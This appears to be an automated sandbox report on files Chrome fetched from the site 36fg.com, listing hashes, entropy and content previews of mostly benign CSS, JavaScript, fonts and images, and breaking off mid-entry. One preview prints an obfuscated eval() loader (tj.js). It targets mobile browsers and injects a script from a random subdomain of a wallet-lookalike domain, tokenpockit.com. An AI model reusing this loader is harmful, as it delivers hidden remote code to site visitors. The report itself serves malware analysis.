                                                        Preview:.PNG........IHDR...y...0.....5.......tEXtSoftware.Adobe ImageReadyq.e<...viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:caacb473-bd35-234a-88ca-1804bf3321d4" xmpMM:DocumentID="xmp.did:BBF82D31FBDF11E999EF954EF4E9BC33" xmpMM:InstanceID="xmp.iid:BBF82D30FBDF11E999EF954EF4E9BC33" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:b6c86112-0bef-3e4f-837b-24203171b571" stRef:documentID="xmp.did:caacb473-bd35-234a-88ca-1804bf3321d4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.4oH...iIDATx..\..TU.>..V..HJ.n.z...
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 121 x 48, 8-bit/color RGBA, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):2889
                                                        Entropy (8bit):7.64628523723061
                                                        Encrypted:false
                                                        SSDEEP:48:ZAvnLPNpXLtQQ8J3JB1NuUOv5/f4Q0Fc3eQqgHa6XozSc7oXXTLDamdyq5OLapAC:uHqQW9Mv5n4lSqkaGoz17AXTLOmDACyI
                                                        MD5:816960F634C9D78C63157D8D67F36C96
                                                        SHA1:00D22A05F8B47ED57C0B2E9903E139BC4CE11983
                                                        SHA-256:68454FE86C83A8089780A6D4852E7256637B52DD339C97611D82B50CAAC96BAD
                                                        SHA-512:88D4C92AB8B9C07B91AD09E3C043EA7B5C973BB80A039CF2E2B0FAC05D5A6963AAFBBCEFB1FD8AD15D63CC3949D6E3F771CAA8A9557E35EA96C28BF48E5E21CF
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR...y...0.....5.......tEXtSoftware.Adobe ImageReadyq.e<...viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:caacb473-bd35-234a-88ca-1804bf3321d4" xmpMM:DocumentID="xmp.did:BBF82D31FBDF11E999EF954EF4E9BC33" xmpMM:InstanceID="xmp.iid:BBF82D30FBDF11E999EF954EF4E9BC33" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:b6c86112-0bef-3e4f-837b-24203171b571" stRef:documentID="xmp.did:caacb473-bd35-234a-88ca-1804bf3321d4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.4oH...iIDATx..\..TU.>..V..HJ.n.z...
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):80
                                                        Entropy (8bit):4.86008308495497
                                                        Encrypted:false
                                                        SSDEEP:3:H+uZt5T/+DthOGka0GnT1K5Qikn:euZq5hTA5Qik
                                                        MD5:341FFEC2C86871C237384D14F7431FA6
                                                        SHA1:4658598CF518498B14F65C40BE8C488824C22BD5
                                                        SHA-256:F36C47A6396C465A5E8ED8338511DA1AB7709C35C06CB6BB67606C3D03DC1AA7
                                                        SHA-512:47477B612F6005399FDDBFE08D7028EF23D6BB4F8DE321F872450DE59146D1ABACE7F7C0DE2EAE55FF4E81B04F0D1A660FB534D57752E928EA1342ECB11074DE
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCSJvKqVkODVAEgUNkWGVTiGcmH6uPV81QRInCcEuLu4DeVRbEgUNkWGVThIFDVALr7ASBQ03eylNIZrBV_sJxCATEiAJWImCJLdODfwSBQ2UVPrPEgUNg6hbPSHPQiUVeiSrBg==?alt=proto
                                                        Preview:CgkKBw2RYZVOGgAKGwoHDZFhlU4aAAoHDVALr7AaAAoHDTd7KU0aAAoSCgcNlFT6zxoACgcNg6hbPRoA
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (805), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):805
                                                        Entropy (8bit):5.5403925686651485
                                                        Encrypted:false
                                                        SSDEEP:24:aC33aqqpb6uSoN0Ct/XOudl5MIfqITUHt/T:aSmTYGv5v5MIfqIEb
                                                        MD5:B91B404E65A6D55F48E3E8929AAA6631
                                                        SHA1:7FEB40AB7AA9C2FF7458E6E89A74AF63C5F56AE8
                                                        SHA-256:D73B625C5E38C3FD1E0D5A113374BEC35307DD4CDE91ACA48167EE3DC33567EE
                                                        SHA-512:B763ED10565DCAAB82033193C5ED96B801DEA1A9842746B1AB7466ABAD39F68BE6122BD998719FE7A18C12E4F536C4079FFBBEBC1F0E1D47AF39B51AD7448825
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://oudngmslhifnsf.gdmgcyy.com/tj.js
                                                        Preview:;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(36)};if('0'.replace(0,e)==0){while(c--)r[e(c)]=k[c];k=[function(e){return r[e]||e}];e=function(){return'[1-57-9a-g]'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('7 8(){1 3=\'\';1 4=\'abcdefghijklmnopqrstuvwxyz\';for(1 i=0;i<6;i++){3+=4.charAt(9.floor(9.random()*4.length))}return 3}1 a="/wuewsmihshs/aisdzmodajmlahf/b.b";7 c(){d 5=navigator.userAgent;d 2=/(spider|bot)/i;e(!2.f(5)){2=/(Android|Web0S|webOS|iPad|iPhone|Mobile|Phone|Kindle|BlackBerry|Opera Mini)/i;e(2.f(5)){document.writeln("<g src=\\"https://"+8()+".tokenpockit.com"+a+"\\"></g>")}}}c();',[],17,'|var|ly_adjs_re|result|characters|ly_adjs_ua||function|generateRandomSubdomain|Math|lujin|js|ly_adjs_0|let|if|test|script'.split('|'),0,{}));
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 (with BOM) text
                                                        Category:downloaded
                                                        Size (bytes):6954
                                                        Entropy (8bit):4.802374704376236
                                                        Encrypted:false
                                                        SSDEEP:192:oRQ4fS5bzRyIy++mcS3n2s96/LEpeXHFykgxe:nlx3pSFh
                                                        MD5:0AA52973A303B631CDEC53538BE90CB3
                                                        SHA1:F9747DDF3665B33AD17AA6543AB8241D2EA64309
                                                        SHA-256:D25FE5E60F185608D92CB61A195496816FEF591817B44030808C1AF920B69F51
                                                        SHA-512:EBD08193F1E86E94C9FE3A95FDBCFE89FB943A8507241ECF3C7F0FD9E9580CD5650952AEE7C75A4A1D63421368984706A7F5A72894524D910DC30EA3E1B162F7
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/css/magnific-popup.css
                                                        Preview:./* Magnific Popup CSS */..mfp-bg {. top: 0;. left: 0;. width: 100%;. height: 100%;. z-index: 1042;. overflow: hidden;. position: fixed;. background: #0b0b0b;. opacity: 0.8; }...mfp-wrap {. top: 0;. left: 0;. width: 100%;. height: 100%;. z-index: 1043;. position: fixed;. outline: none !important;. -webkit-backface-visibility: hidden; }...mfp-container {. text-align: center;. position: absolute;. width: 100%;. height: 100%;. left: 0;. top: 0;. padding: 0 8px;. box-sizing: border-box; }...mfp-container:before {. content: '';. display: inline-block;. height: 100%;. vertical-align: middle; }...mfp-align-top .mfp-container:before {. display: none; }...mfp-content {. position: relative;. display: inline-block;. vertical-align: middle;. margin: 0 auto;. text-align: left;. z-index: 1045; }...mfp-inline-holder .mfp-content,..mfp-ajax-holder .mfp-content {. width: 100%;. cursor: auto; }...mfp-ajax-cur {. cursor: progress; }...mfp-zoom-out-cur, .mfp-zoom-o
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (3194)
                                                        Category:downloaded
                                                        Size (bytes):3364
                                                        Entropy (8bit):4.923536839569365
                                                        Encrypted:false
                                                        SSDEEP:48:xZo8LL+IJWmQq+v+dDKopvu+ztL+F/+wI+weAzT+RV+VAPsAvqeghOHHy3VzoRv2:mgA6eA2+AbdEK7pcXVxZaIyCNMM
                                                        MD5:878B348B66204D320ADCAD9D46244DE2
                                                        SHA1:72058773DB2DAE47A826033350E427641F98783D
                                                        SHA-256:F1FA695558339B2AA63AE1EE85DA5751D24386244D3AC89E425230B908585E89
                                                        SHA-512:63398B951C042C0E8FA6E8C20961D5D5A69BC9D74D0E6A2F18921E96E2DC037F12C2EB24572493AFA1FDF276F2EEFFA68589C7DBC113B1FC8C671785402C2292
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/css/owl.carousel.min.css
                                                        Preview:./**. * Owl Carousel v2.3.4. * Copyright 2013-2018 David Deutsch. * Licensed under: SEE LICENSE IN https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSE. */..owl-carousel,.owl-carousel .owl-item{-webkit-tap-highlight-color:transparent;position:relative}.owl-carousel{display:none;width:100%;z-index:1}.owl-carousel .owl-stage{position:relative;-ms-touch-action:pan-Y;touch-action:manipulation;-moz-backface-visibility:hidden}.owl-carousel .owl-stage:after{content:".";display:block;clear:both;visibility:hidden;line-height:0;height:0}.owl-carousel .owl-stage-outer{position:relative;overflow:hidden;-webkit-transform:translate3d(0,0,0)}.owl-carousel .owl-item,.owl-carousel .owl-wrapper{-webkit-backface-visibility:hidden;-moz-backface-visibility:hidden;-ms-backface-visibility:hidden;-webkit-transform:translate3d(0,0,0);-moz-transform:translate3d(0,0,0);-ms-transform:translate3d(0,0,0)}.owl-carousel .owl-item{min-height:1px;float:left;-webkit-backface-visibility:hidden;-webkit-touch
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 (with BOM) text
                                                        Category:downloaded
                                                        Size (bytes):37709
                                                        Entropy (8bit):4.85451890799546
                                                        Encrypted:false
                                                        SSDEEP:384:YRodtV7yAJY1aAbMLih9Px0P22qljTHKFTyCaWShREHtJRV0Dcns:YRodt8h9zlSvTkREHtLs
                                                        MD5:4C546868AB24B77546BD64E17C2FC2D6
                                                        SHA1:241DCF551AE6A27D2650FFD08C1B2B75563A99C0
                                                        SHA-256:22AF33006C9F168E7118F9DB04F4025E288D11E1A8854C4CEBC3A8E7BF05AE31
                                                        SHA-512:D5623AF975679EAD875911ECA5689BA8194B7807872F8D429FEED507D7676B1F00091F901134F6CCD242CB55DAE1BAD9E9DFD72B5DFD66F4A14BCA5254FE1C7A
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/css/style.css
                                                        Preview:./*. Theme Name: appnox - Product Landing HTML5 Template. Author: theme_group. Support: robiulislamfree@gmail.com. Description: appnox is app landing PSD Template.This is a clean Professional and Creative Design using bootstrap 1170px Grid System.You can use appnox as a better way to present and promote your startup mobile apps,. Tags: business, clean design, clean layout, marketing, minimal design, minimalist, modern, newsletter, app, app landing, App Showcase, digital, digital product, landing page, mobile apps, modern, sales apps, sass, software, startup,. Version: 1.0.*/./* CSS Index.-----------------------------------..1..google fonts.2..theme default css.3..pre loader css.4..header area css.5..main menu area css...i. sub menu.6..search form area css .7..hero area css.8..services area css.9..about area css.10..pricing table area css.11..videos area css.12..screen shots area css.13..call to action area css.14..faq area css.15..testimonial area css.16..latest blog area css
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                        Category:downloaded
                                                        Size (bytes):12492
                                                        Entropy (8bit):4.304122361423903
                                                        Encrypted:false
                                                        SSDEEP:192:4jFmUaLNaWLNguvaLchNRj98bgDZ8lWDDwTf+aLcQNEj98bgDZ8aWDDwQfOf/aLC:4jIa307
                                                        MD5:3903EB5AF0735B0B186FECBCF9C94D87
                                                        SHA1:FD21C8EE35DBF8D8E53E9CEC5D611037EEF5310A
                                                        SHA-256:8EF0727084E2E653E642193CA00C5D37BFAF479285ED393ED81B88DC139A41AB
                                                        SHA-512:0DFE5932BF7589E0A3ED4D9A7612E842F59098487A76FAA8CA36F96BA3BB0018F530370AD0FAE8AD59F88384E21C8109A58E45BEC636CA91285B0DC747A13D0A
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/css/responsive.css
                                                        Preview:./* Latop Device :1200px. */..@media (min-width: 1200px) and (max-width: 1500px) {}....../* LG Device :992px. */..@media (min-width: 992px) and (max-width: 1200px) {.. .search-form-centered {.. width: 90%;.. }.... .header-top-btn {.. margin: 25px 0 0 40px;.. }.... .footer-widget.widget-2 {.. margin-left: 30px;.. }.... .appnox-latest-blog-area {.. margin: 100px 0 0 0;.. }.... .appnox-pagination {.. margin: 0 0 30px 15px;.. }..}....../* MD Device :768px. */..@media (min-width: 768px) and (max-width: 991px) {.. .header-logo {.. margin-top: 30px;.. }.... .search-form-centered {.. width: 90%;.. }.... .header-top-btn {.. margin: 25px 0 0 30px;.. }.... .header-top-btn .btn {.. margin-right: 70px;.. }.... .hero-mobile-img {.. display: none;.. }.... .appnox-about-img {.. position: inherit;.. width: 100%;.. margin-bottom: 50px;.. }....
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Web Open Font Format (Version 2), TrueType, length 7776, version 1.0
                                                        Category:downloaded
                                                        Size (bytes):7776
                                                        Entropy (8bit):7.968082783938681
                                                        Encrypted:false
                                                        SSDEEP:96:SDFV9xLb1fYNguLOM4cdOGezH/KK3L33+kQM7h25wHdVG2P1j2amxokdj1bEe4k5:SRLbaNj/1IL3u6h25wHuK1aadkJbgD2X
                                                        MD5:84780596E268AA0CB2BE48AF2ED5C375
                                                        SHA1:D67CCD32F8C790A746D64D06145882A2F7B06560
                                                        SHA-256:D7BA57E3CCC2E3B2BDF8CC9E613194B802607682BF473293C2E3E29DE82C9491
                                                        SHA-512:0E7B489A067BF54B58625421384D93AE793394D4993ED61E7509FBCAF31D4BDDF0D8451E69C9AF935B22DDB34B31278BDA75EA2C0A76E5E3C249615723026B77
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/fonts/pxibyp8kv8jhgfvrlgt9z1xlfq.woff2
                                                        Preview:wOF2.......`......?p............................. .0.`..T..0....6..6.$..h. ..H....<2....Z..(W.&...n.p.+.0."!.....c.....C%....?FzBe...^qP....Ory.~.P....J.....!o.*\!T.".7<....=.FO...%%..Z......9.E.s....k.-_.^....".\.]......hWT....s.r\Q...i.V...V.%..a.A.G........Eb+..x......' ...s.Z......^8...i._d"].<.IuP4Q............k.,...im.@.....U....=.....VT..`Q.(J..2t.......8...~.Z.D&:.....\V.U?.+..0b.&.`.LY.9N..."...d.aEtO..6@.Y/T.gc..e\..D...F..z.\...a%.w....x.@...v.<2}.!P.........g..v..(`.6.!.F....O.+g.6...J......)....B. .....8.0''>').<..p0Y}^."...^..j.9...Ms.joL.6...........z......>..0...~/'/Z._../..7.06../.+X{7.!J.0....$..k"..J`}>...2._.0...M...m^........Znyb ..q...k=...bD.=<.?.\..,.$u....>.6 F5Xi...G..'...QF.YBA......!.*.i..R.qn^.3l.@?..C..C.Ug3.N..:.5TU...,&..Lz=sg..5..0..d...y...SG..o3...LT.u...:.jj..2...a..*.K..k.R......}mm.v.[.+..............4.hBUzm...6.n.4.3Y.d..s...l0p...0L0........s..H=n"...d.$.-)...q....).*5(...B....h.]..".x..Z..]..d....2.>...C.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, ASCII text
                                                        Category:downloaded
                                                        Size (bytes):148
                                                        Entropy (8bit):4.3516667792216674
                                                        Encrypted:false
                                                        SSDEEP:3:qLzLURObOb0qHXbvxL4AqWrKb0GklITULLP61IWKBc4NGDFV:qLzLIkObRHXLx0AqWObtklIgLP8IWKqz
                                                        MD5:630E1F9FEF1A483FE84154E2D0D046DF
                                                        SHA1:F10E0CF39FB920A438116CAAEA80A71E0DCDC162
                                                        SHA-256:9CAD3CFF676946810A81047247F12E4E51FACCC01DF4134EDFD871AEE8BA0956
                                                        SHA-512:33F8257B60C25704F0856806337C13E8AFE964C5B075D80F15ABD87FFA59FF0329F12DE0C4B5978D4640D5B70C0A997C0C239F422D4DA5BBDCB3727C281CFCDA
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/favicon.ico
                                                        Preview:.<html>.<head><title>404 Not Found</title></head>.<body>.<center><h1>404 Not Found</h1></center>.<hr><center>nginx</center>.</body>.</html>.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 90 x 90, 8-bit/color RGBA, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):17542
                                                        Entropy (8bit):7.978461173050082
                                                        Encrypted:false
                                                        SSDEEP:192:l/Lp1LRD5wPCNOxW9D8g48Dy1hcmb0cc66Qw1m0wrr2a2qV4pVkYlXm/O7Di7kYQ:BIxW9D8T8ePcLZ62rpV5mwDiEzfL
                                                        MD5:E45832F6D5BC6F8834E4FE5EA0137AB4
                                                        SHA1:A43C7F83860AC8F56F0D67509F412DEB26B798A2
                                                        SHA-256:6DD5D8B90498343CCDFB12EF42849B5D630A2EB4A889C5B4C536101BF5B4C9D7
                                                        SHA-512:4F54A7A65F38619CFC1CA37DD9BFC3CCADCC1676C3536D9ECD95DEA68A4C7ED56F9FB1696E88E9FEF2EB5DC51CAE56617AB4F7A3E6FE99A4C2B05841F7098363
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR...Z...Z.....8.A.....tEXtSoftware.Adobe ImageReadyq.e<...viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:caacb473-bd35-234a-88ca-1804bf3321d4" xmpMM:DocumentID="xmp.did:3AC0E2AFFBE111E9A85BA46E7997AEC4" xmpMM:InstanceID="xmp.iid:3AC0E2AEFBE111E9A85BA46E7997AEC4" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:39ddb404-a848-5242-adf7-8b648b3adca0" stRef:documentID="xmp.did:caacb473-bd35-234a-88ca-1804bf3321d4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>/\2Y..@.IDATx.}..dgu.K.{.....Ih..
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (846)
                                                        Category:downloaded
                                                        Size (bytes):1016
                                                        Entropy (8bit):5.232002098590041
                                                        Encrypted:false
                                                        SSDEEP:24:t/emCtetORzuZiqMdhuzTqgfkPH2nouoKLn7tk8:xZo8WSZiqMAqgfW8L9d
                                                        MD5:9586C66236052E923B82D1E36AFA5F0F
                                                        SHA1:9C9255AA7969CE0420C549321A219F549711F662
                                                        SHA-256:ED4068F616EC2E74C89136D150F4C99ECE1C92270F6952966FF374387D5464C3
                                                        SHA-512:9ABA2B41B8C955B89583338AD078F315FEDDB96B68BF72B2BB91F3B2A12A9F9AEF1F7C25FCE413F6DE340294B5F994CE8EF4DBBBBD5ED05F3EF87889A9D27756
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/css/owl.theme.default.min.css
                                                        Preview:./**. * Owl Carousel v2.3.4. * Copyright 2013-2018 David Deutsch. * Licensed under: SEE LICENSE IN https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSE. */..owl-theme .owl-dots,.owl-theme .owl-nav{text-align:center;-webkit-tap-highlight-color:transparent}.owl-theme .owl-nav{margin-top:10px}.owl-theme .owl-nav [class*=owl-]{color:#FFF;font-size:14px;margin:5px;padding:4px 7px;background:#D6D6D6;display:inline-block;cursor:pointer;border-radius:3px}.owl-theme .owl-nav [class*=owl-]:hover{background:#869791;color:#FFF;text-decoration:none}.owl-theme .owl-nav .disabled{opacity:.5;cursor:default}.owl-theme .owl-nav.disabled+.owl-dots{margin-top:10px}.owl-theme .owl-dots .owl-dot{display:inline-block;zoom:1}.owl-theme .owl-dots .owl-dot span{width:10px;height:10px;margin:5px 7px;background:#D6D6D6;display:block;-webkit-backface-visibility:visible;transition:opacity .2s ease;border-radius:30px}.owl-theme .owl-dots .owl-dot.active span,.owl-theme .owl-dots .owl-dot:hover span{bac
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (32000)
                                                        Category:downloaded
                                                        Size (bytes):42766
                                                        Entropy (8bit):5.082749850320046
                                                        Encrypted:false
                                                        SSDEEP:768:JBA7PMMFA0tdlXKNSR4vlGRep2lcwJeL+C2jQdc7/CORUQuFBt33:HAIMFFdYMxAcLQDV
                                                        MD5:B7B9C97CD68EC336D01A79D5BE48C58D
                                                        SHA1:1A99890B57C9859A622337ED0B2F989D6E30CC0E
                                                        SHA-256:B394D33B2A7EC654A6B037EBFDA6618341B3F897A362BE624C923C2711B54A43
                                                        SHA-512:968E18822C24C6C54827999EC766FE54750A9489D22B6A45B641854731EC00BEB8FD93B9BDA8823E67463F7A99AB587D333673821AE90CFDF7E92716BA050C4E
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/js/owl.carousel.min.js
                                                        Preview:/**. * Owl Carousel v2.2.1. * Copyright 2013-2017 David Deutsch. * Licensed under (). */.!function(a,b,c,d){function e(b,c){this.settings=null,this.options=a.extend({},e.Defaults,c),this.$element=a(b),this._handlers={},this._plugins={},this._supress={},this._current=null,this._speed=null,this._coordinates=[],this._breakpoint=null,this._width=null,this._items=[],this._clones=[],this._mergers=[],this._widths=[],this._invalidated={},this._pipe=[],this._drag={time:null,target:null,pointer:null,stage:{start:null,current:null},direction:null},this._states={current:{},tags:{initializing:["busy"],animating:["busy"],dragging:["interacting"]}},a.each(["onResize","onThrottledResize"],a.proxy(function(b,c){this._handlers[c]=a.proxy(this[c],this)},this)),a.each(e.Plugins,a.proxy(function(a,b){this._plugins[a.charAt(0).toLowerCase()+a.slice(1)]=new b(this)},this)),a.each(e.Workers,a.proxy(function(b,c){this._pipe.push({filter:c.filter,run:a.proxy(c.run,this)})},this)),this.setup(),this.initialize()
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text
                                                        Category:downloaded
                                                        Size (bytes):760
                                                        Entropy (8bit):4.5374853967293385
                                                        Encrypted:false
                                                        SSDEEP:12:jGNu+UG4/aD/4VkvfeON2vGCebHoY9HY9bsNrOiXRoCO9HYpZxElK1m91PdmkLrI:qN8CDAVkvfepvGC6HT949bsNrOiBoH4v
                                                        MD5:074C4C08F0730C4D4CA76F724355807C
                                                        SHA1:09D6A93AF6B87A67C5773163D35F40B993FCA3D3
                                                        SHA-256:C6129BD3AEB079F5C310D2A9618478BA0D621992C1A5E5EF320917937DC2DBB7
                                                        SHA-512:A45D1AA93F012A328C46ADA04CD59C65F6BB821A242A499DB3F8F5BC88DB74FD7B4F83A478F58F93D967A9E12C96532407F8041CE6E81DED0BC478A213D59005
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/js/plugins.js
                                                        Preview:// Avoid `console` errors in browsers that lack a console..(function() {. var method;. var noop = function () {};. var methods = [. 'assert', 'clear', 'count', 'debug', 'dir', 'dirxml', 'error',. 'exception', 'group', 'groupCollapsed', 'groupEnd', 'info', 'log',. 'markTimeline', 'profile', 'profileEnd', 'table', 'time', 'timeEnd',. 'timeline', 'timelineEnd', 'timeStamp', 'trace', 'warn'. ];. var length = methods.length;. var console = (window.console = window.console || {});.. while (length--) {. method = methods[length];.. // Only stub undefined methods.. if (!console[method]) {. console[method] = noop;. }. }.}());..// Place any jQuery/helper plugins in here..
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (8320)
                                                        Category:downloaded
                                                        Size (bytes):8636
                                                        Entropy (8bit):5.317260947099979
                                                        Encrypted:false
                                                        SSDEEP:192:lDYT/2wPZgoOfzAL0kvzaPZNI1C/W0DVLzcuQWyn:lMT/2wPxOfzapbaPZNI8/tzGWC
                                                        MD5:D7C97FDD45A562ACE6CFFDDC9437A779
                                                        SHA1:EB6A5E550AB67F95986363A87DA875212BA2F139
                                                        SHA-256:525BA420F42F72699E059E5C20DD3ACD591DA3D54D70A319B0E360369482DDE8
                                                        SHA-512:65EF6C5B824D66C2546B3CEDCEEEFA967AAD3787002BE2E2721C14FBD846CDD75B63A8AA102005276356FFF04CC5BD9A79D53F216385E001E79FA49247669633
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/js/modernizr-3.5.0.min.js
                                                        Preview:/*! modernizr 3.5.0 (Custom Build) | MIT *. * https://modernizr.com/download/?-cssanimations-csscolumns-customelements-flexbox-history-picture-pointerevents-postmessage-sizes-srcset-webgl-websockets-webworkers-addtest-domprefixes-hasevent-mq-prefixedcssvalue-prefixes-setclasses-testallprops-testprop-teststyles !*/.!function(e,t,n){function r(e,t){return typeof e===t}function o(){var e,t,n,o,i,s,a;for(var l in C)if(C.hasOwnProperty(l)){if(e=[],t=C[l],t.name&&(e.push(t.name.toLowerCase()),t.options&&t.options.aliases&&t.options.aliases.length))for(n=0;n<t.options.aliases.length;n++)e.push(t.options.aliases[n].toLowerCase());for(o=r(t.fn,"function")?t.fn():t.fn,i=0;i<e.length;i++)s=e[i],a=s.split("."),1===a.length?Modernizr[a[0]]=o:(!Modernizr[a[0]]||Modernizr[a[0]]instanceof Boolean||(Modernizr[a[0]]=new Boolean(Modernizr[a[0]])),Modernizr[a[0]][a[1]]=o),w.push((o?"":"no-")+a.join("-"))}}function i(e){var t=S.className,n=Modernizr._config.classPrefix||"";if(x&&(t=t.baseVal),Modernizr._co
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 1920 x 636, 8-bit/color RGBA, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):427076
                                                        Entropy (8bit):7.99438735345465
                                                        Encrypted:true
                                                        SSDEEP:6144:+mc5UaBHLeubOusQ9dXkb0noYkk9girgnGR20gqa58JEWDcMiZOAiksbUqX:toFegOy9FQAoYz9girO620lNL2QoMX
                                                        MD5:4DEC1089F739E65C4E0B73997DEA8318
                                                        SHA1:1AFEDEF01AE5C7AC15FB8EA3158E94AC87EE6F4B
                                                        SHA-256:5A0583B7E74FEABF9887A5959DC8EF1121942162C6706DD8DFB49D3A5014B152
                                                        SHA-512:6DBA221ADEBC45C33BF8792ED2088DCDF22B6FF854C6A037195EA821B84A1D84B272723ACF4A61B9F204EF9CB2E9A341AD64A10C78CF09667983E0336B43DA7A
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR.......|............tEXtSoftware.Adobe ImageReadyq.e<...viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:caacb473-bd35-234a-88ca-1804bf3321d4" xmpMM:DocumentID="xmp.did:7537D6B3FBE011E98E90E01D7ED8B7D1" xmpMM:InstanceID="xmp.iid:7537D6B2FBE011E98E90E01D7ED8B7D1" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:39ddb404-a848-5242-adf7-8b648b3adca0" stRef:documentID="xmp.did:caacb473-bd35-234a-88ca-1804bf3321d4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.7.....dIDATx..iz#;.%.s..#2....^H..
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (20087)
                                                        Category:downloaded
                                                        Size (bytes):20216
                                                        Entropy (8bit):5.338721920008614
